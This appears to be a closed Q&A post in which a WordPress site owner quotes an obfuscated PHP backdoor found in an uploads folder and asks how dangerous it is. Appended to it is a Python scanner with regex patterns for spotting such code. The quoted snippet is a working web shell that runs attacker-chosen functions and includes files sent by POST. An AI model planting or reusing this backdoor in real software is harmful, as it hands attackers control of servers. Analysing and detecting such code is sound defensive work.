How dangerous is this suspicious PHP code? [closed]

Çağlar Arlı

I found this code on my web server in /wp-content/uploads/2023/index.php:

$hello_dolly[]='b8f878fc41d0fd3c';
$hello_dolly[]=$_POST;
$hello_dolly[]='color';
if (isset($hello_dolly[1][$hello_dolly[0]])) {
    $dolly = $hello_dolly[1][$hello_dolly[2]]($hello_dolly[1]['theme']($hello_dolly[1][$hello_dolly[0]]));
    $dolly['themes'] = $dolly['theme']();
    $dolly['footer'] = $dolly['footer']($dolly['themes'])[$dolly['name']];
    $dolly['body']($dolly['themes'], $dolly['color']($dolly['header']));
    require_once($dolly['footer']);
    $dolly['size']($dolly['themes']);
}

(It was inserted into presumed-innocent code from https://plugins.trac.wordpress.org/browser/hello-dolly/trunk/hello.php)

I think I've worked out that (among other things), it tries to call $_POST['color'], $_POST['theme'] and $_POST['footer'] as functions, and if that succeeds, then potentially to execute an arbitrary PHP file with require_once.

But is it possible for it to find anything callable from a user-submitted $_POST array?
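
A triage heuristic for the pattern in the snippet above, added here as an example and not part of the original question. The snippet never calls `$_POST[...]()` directly (it copies `$_POST` into another array first), so the check looks for request input, array-element function calls and variable includes independently; the function names and regexes are assumptions made for this illustration.

```python
import re
from pathlib import Path

# Subscript that may contain one nested subscript, e.g. [$a[0]].
_SUB = r"\[(?:[^\[\]\n]|\[[^\[\]\n]*\])*\]"

INDICATORS = {
    # Request data is read anywhere in the file.
    "request_input": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|FILES)\b"),
    # Variable function: the callee is an array element, $x['k'](...).
    "dynamic_call": re.compile(r"\$\w+(?:\s*" + _SUB + r")+\s*\("),
    # include/require whose target is a variable, not a string literal.
    "dynamic_include": re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$", re.I),
}

def indicators(source: str) -> dict:
    """Count matches per indicator in one PHP source string."""
    return {name: len(rx.findall(source)) for name, rx in INDICATORS.items()}

def is_suspicious(source: str) -> bool:
    """Request input plus a dynamic call or dynamic include in the same file."""
    hits = indicators(source)
    return bool(hits["request_input"] and (hits["dynamic_call"] or hits["dynamic_include"]))

def scan_uploads(root: str) -> list:
    """Return (path, hits) for every flagged .php file under root."""
    flagged = []
    for path in sorted(Path(root).rglob("*.php")):
        source = path.read_text(errors="replace")
        if is_suspicious(source):
            flagged.append((str(path), indicators(source)))
    return flagged

# Three lines taken from the snippet quoted in the question.
QUOTED = r"""
$hello_dolly[]=$_POST;
    $dolly = $hello_dolly[1][$hello_dolly[2]]($hello_dolly[1]['theme']($hello_dolly[1][$hello_dolly[0]]));
    require_once($dolly['footer']);
"""
# Constructed benign sample: reads request data but calls a named function.
BENIGN = r"<?php $name = sanitize_text_field($_POST['name']); require_once('lib.php');"

if __name__ == "__main__":
    print(indicators(QUOTED), is_suspicious(QUOTED))
    print(indicators(BENIGN), is_suspicious(BENIGN))
```

A hit is a reason to inspect the file by hand, not proof of compromise, since legitimate code sometimes stores callbacks in arrays. Any `.php` file under `wp-content/uploads` deserves a look regardless of what this returns.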